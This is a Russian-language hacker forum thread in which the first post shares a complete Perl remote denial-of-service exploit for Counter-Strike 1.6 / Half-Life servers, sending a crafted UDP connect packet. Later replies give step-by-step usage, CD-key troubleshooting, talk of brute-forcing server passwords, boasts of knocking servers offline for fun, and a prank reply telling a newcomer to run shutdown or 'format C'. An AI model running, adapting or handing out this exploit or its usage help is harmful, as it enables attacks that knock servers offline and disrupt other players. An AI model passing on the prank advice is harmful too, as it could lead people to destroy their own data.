1. kipfun

    kipfun New Member

    Joined:
    7 Jun 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    нашел рульный сплот убивающий серваки CS:

    #!/usr/bin/perl
    # Half-Life engine remote DoS exploit
    # bug found by Firestorm
    # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
    # dedicated server
    use IO::Socket;
    die "usage: ./csdos <host>" unless $ARGV[0];
    $host=$ARGV[0];

    if (fork())
    { econnect($host); }
    else
    { econnect($host); };
    exit;

    sub econnect($)
    {
    my $host=$_[0];
    my $sock = new
    IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
    die "Could not create socket: $!\n" unless $sock;
    $cmd="\xff\xff\xff\xff";
    syswrite $sock, $cmd."getchallenge";

    sysread $sock,$b,65535; print $b,"\n";
    @c=split(/ /,$b);

    $c2=$c[1];

    $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
    print '>',$q,"\n";
    syswrite $sock, $q;
    sysread $sock,$b,65535; print $b,"\n";
    sleep 3;
    close $sock;
    }

    все пашет....но запероленный сервак..не берет..вылетает : $BADPASSWORD
    $BADPASSWORD

    у кого какие соображения будут ?
     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    у меня никаких, ну впринципе если ты напишешь брут к серву, потом пробрутишь валидный пароль, потом составишь эксплойт, так чтоб он передавал пароль, то может и зачёт сдаш
     
  3. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    у меня появились - защищу свой сервер :)
     
  4. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Не плохой сплойт.
    Спасибо!
     
  5. kipfun

    kipfun New Member

    Joined:
    7 Jun 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Сам тащусь..... :) но все таки ! как можно реализовать...подвес запорленных серваков? и еще допустим я добыл пароль , куда его можно прописать.
     
  6. De_X

    De_X Banned

    Joined:
    30 Nov 2005
    Messages:
    83
    Likes Received:
    7
    Reputations:
    2
    :rolleyes: подскажите пожалуйста куда сам сплойт пихать чтоб отрубить сервак?
     
  7. Haz3r

    Haz3r New Member

    Joined:
    28 May 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Вощем смари сюда ! Нажимаеш Пуск-Выполнить- Shutdown -t 00 вроде так если не поможет то вот так format C там вощем окошко появится в которое эту шнягу вбить надо и нажать CTRL+ENTER ! Спрашиваеш почему все так сложно ? а потому что мы же хакеры и способы у нас должны быть хакерские ;) так что давай жги сервы !
     
  8. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.
     
  9. TreniX

    TreniX Elder - Старейшина

    Joined:
    27 May 2006
    Messages:
    19
    Likes Received:
    25
    Reputations:
    26
    remote DoS exploit

    Сплойт рулит!! :D
    а где ты его добыл?? :confused:
     
    #9 TreniX, 13 Jun 2006
    Last edited: 13 Jun 2006
  10. De_X

    De_X Banned

    Joined:
    30 Nov 2005
    Messages:
    83
    Likes Received:
    7
    Reputations:
    2
    а как этот сплойт включать? я на сервак зайдуи как сплоит активировать?
     
  11. kipfun

    kipfun New Member

    Joined:
    7 Jun 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь :) ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS
     
  12. Haz3r

    Haz3r New Member

    Joined:
    28 May 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Там был вопрос где ты его достал? я не он но скажу что где угодно =) я этот сплойт увидел еще месяцев 6 назад и вообще и считаю что такие вещи должны быть приватными , ибо всякие ....... кхм нехорошие люди вешают сервы дайте вы поиграть то нормально и скажите зачем вам это надо ? ( я не в счёт =)) я рубил рублю и буду рубить сервы а почему ? потому-что прикольно :) )
     
  13. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    Haz3r, уже неважно 4то сабж давно паблик, т.к. на 28 пат4е по слухам (т.к. сам не дока4ал =) уже уязвимости нет
     
  14. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    и нас4ет брута: еще для 45-46 протоколов были готовые реализации...
     
  15. De_X

    De_X Banned

    Joined:
    30 Nov 2005
    Messages:
    83
    Likes Received:
    7
    Reputations:
    2
    кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...
     
  16. lolka

    lolka New Member

    Joined:
    27 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    2kipfun: пишу как ты и сказал "c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx" пишит мне
    ****

    A00000000 1617623932 2

    >****connect 47 1617623932 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a362 58af1bb64
    ed866538c9db76""\"
    ****9Invalid hashed CD key.

    Можети обьснить мне что это такое?;)
     
  17. kipfun

    kipfun New Member

    Joined:
    7 Jun 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    неверный CD ключ, введи в строку (cdkey\\f0ef8a362 58af1bb64ed866538c9db76) действительный ключ...
     
  18. lolka

    lolka New Member

    Joined:
    27 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    2kipfun: а ты пробывал? ;) сам пользватся этим експлойтом? ;)
     
  19. kipfun

    kipfun New Member

    Joined:
    7 Jun 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    обижашь :) в своей локалке житья никому не даю...... рубит все серваки на повал! и хл и кс 1.6, тока под паролем не берет..... а так все на ура..! у тебя может не идти потому что может патч послдений поставили, в них этот баг исправили.....не заню в нет это актуально будет еще не много....а в локалках еще долго...
     
  20. stalker.md

    stalker.md New Member

    Joined:
    25 Jun 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Я открываю перл делаю как ва написали,мне пишет:
    <Do you need to predeclare pl?>
    А этот сплоит куда пихать надо?
    как можно бан в кс снять?
    Подскажите чтото* :(